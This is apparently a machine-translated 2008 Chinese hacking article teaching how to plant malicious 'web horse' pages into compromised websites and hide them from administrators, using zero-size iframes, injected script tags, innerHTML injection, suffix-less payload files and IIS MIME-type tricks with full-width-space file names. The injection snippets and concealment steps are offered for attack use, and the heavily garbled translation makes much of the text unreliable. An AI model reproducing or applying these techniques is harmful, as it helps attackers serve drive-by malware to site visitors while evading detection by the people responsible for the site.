The page hung it-vulnerability warning-the black bar safety net

ID MYHACK58:62200818619
Type myhack58
Reporter 佚名
Modified 2008-03-26T00:00:00


Words of a night, dark and stormy's. A black couldn't be black hack, in X site hanging on his painstakinglyfree killY net horse. Pony just hanging on the soon to be ruthlessly click! Our wise God Yong Z administrator once again to Ferret out the hidden has another hidden pony......

Nonsense not say more, today to introduce how hung it is. Maybe you will be surprised. Hung it, the online is not a streaming method? the iframe and Script are made, how are people to show off? Listen to me, who hung it, are ultimately to be found(crap!), the But if we can maximize the Hide check, wouldn't it be even better? Because the hanging horse is also a kind of art.

Below I will introduce to you several hanging horse trick, the key is hidden. First let's look at several common web page hang horse way, has been will just skip it!

1)<iframe src=”muma.htm” width=0 height=0></iframe>

2)<script src=muma.js language=javascript></script>

3)top. document. body. innerHTML = top. document. body. innerHTML + '\r\n<iframe src="muma.htm "></iframe>'

The above are the online common hang horse way. Hung it about is hidden, do not let the other side found;and if found to be hanging horse, can not easily exposed network mA address. What do I do? We have a trick!

Go to the file suffix method

In most cases, we hang horse are used to and this in two ways, discerning to see that there is a problem. We simply deal with it, the suffix is removed, at the same time plus confusing factor. For the Script to call, we will call the code to, at the same time will call the network horse of the JS file in the same directory, renamed to javascript. Yes, you read that right, the net horse called JS file is http://www. shadu120. com/javascript. Network mA discovery difficulty is not all of a sudden increase a lot? We continue to remodel, call the code to use, network the horse was renamed in the same directory as the width of the. Of course, if you're“sinister”,“cunning”, not afraid criticize, you can then consider other, more confusing names.

Variation file suffix method

Although this trick in the Internet there appeared, however it summarizes and extends the did not. Below we break it. Many people have used this model to hang over the horse, that the Script hung it this way does not depend on the file suffix, but you've seen? Today we'll implement it. This, of course, have a certain premise. Net Horse the same server to be in your hands, or you have a web site in the IIS Management Permissions. We know that IIS for the visited file of the type is based on extension to identify, such as our input index. asp, the system will call the asp. dll to resolve; 输入index.htm, it is automatically interpreted as HTML code; if it is an exe file, directly tips download. This triggered my inspiration, why don't you construct one yourself need the suffix? Open IIS Manager, find the website, right click to see“properties->headers->file types”, 新建文件扩展名.com the file type is text/html, click OK after this extension on the website you can use, and will be treated as HTML to parse, as shown in Figure 1.


Next, we hung it up! 在 网站 目录 下 找到 要 插入 代码 的 网页 index.html added code. Figure 2 everyone to read? Is a and Website of the same name of the file to do the web horse. Refresh http://www. shadu120. com, wow! Net horse obediently came out, as shown in Figure 3. Which the administrator will think“src=”followed by your website domain name will actually be a net horse? Ha ha!


No file name method

This is the last trick! It says here no the file name does not refer to net horse without a file name, but we give the net horse from an invisible file name. Hey, if black, then black in the end! Windows 2 0 0 0 the IIS does not require additional configuration, here Windows 2 0 0 3 as an example, because Windows 2 0 0 3 for IIS by default does not support No 缀文 member. Open IIS Manager, and locate computer right click to see properties, and then select MIME types. Create a new extension“.*”, the The type of fill for the text/html or application/postscript, after determining IIS 6.0 will support No 缀文 Member, the specific operation shown in Figure 4.


OK, next we are in the website directory and put a network Horse, the name was changed to“■”note:■represents the Chinese full-width spaces is!, the And then the code“ a ”note: equal sign is behind a Chinese full-width spaces inserted into the index. html file.

Now in the browser type http://www. shadu120. com/, ha ha, see? Or directly input http://www. shadu120. com/■, you can also immediately see the effects! As shown in Figure 5.


In addition, under Windows the file name can also contain“=”, then the above code naturally produces a“”modification, built a file named“=”of the file as network horses, the same could confuse the Administrator's eyes.

Finally, to give you a details of tips. Hung it, it is best to Use JavaScript to modify the browser status bar the information before calling the network horse of the time is see the clues. Of course, if you are using“no file name”method, this step can be omitted.

Network security no limit, the more things we need to know and break. Hope everyone in the New Year continuous efforts, continue to play imagine, in the limited space to build your own network security!